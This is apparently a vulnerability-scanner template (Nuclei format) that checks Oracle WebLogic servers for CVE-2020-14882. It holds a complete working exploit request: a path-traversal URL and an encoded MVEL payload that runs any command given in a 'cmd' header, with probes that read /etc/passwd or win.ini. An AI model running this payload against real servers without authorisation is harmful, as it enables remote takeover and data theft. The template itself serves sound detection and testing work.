47 lines
3.1 KiB
YAML
47 lines
3.1 KiB
YAML
id: CVE-2020-14882
|
|
|
|
info:
|
|
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
|
|
author: dwisiswant0
|
|
severity: critical
|
|
reference: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
|
description: |
|
|
Vulnerability in the Oracle WebLogic Server
|
|
product of Oracle Fusion Middleware (component: Console).
|
|
Supported versions that are affected are 10.3.6.0.0,
|
|
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
|
|
Easily exploitable vulnerability allows unauthenticated
|
|
attacker with network access via HTTP to compromise the server.
|
|
Successful attacks of this vulnerability can result in takeover.
|
|
tags: cve,cve2020,oracle,rce,weblogic
|
|
|
|
# References:
|
|
# - https://twitter.com/jas502n/status/1321416053050667009
|
|
# - https://youtu.be/JFVDOIL0YtA
|
|
# - https://github.com/jas502n/CVE-2020-14882#eg
|
|
|
|
requests:
|
|
- payloads:
|
|
exec:
|
|
- "type C:\\Windows\\win.ini" # Windows
|
|
- "cat /etc/passwd" # *nix
|
|
raw:
|
|
- |
|
|
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
|
Host: {{Hostname}}
|
|
cmd: §exec§
|
|
Connection: close
|
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
|
|
|
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
- "\\[(font|extension|file)s\\]"
|
|
condition: or
|
|
part: body
|
|
- type: status
|
|
status:
|
|
- 200 |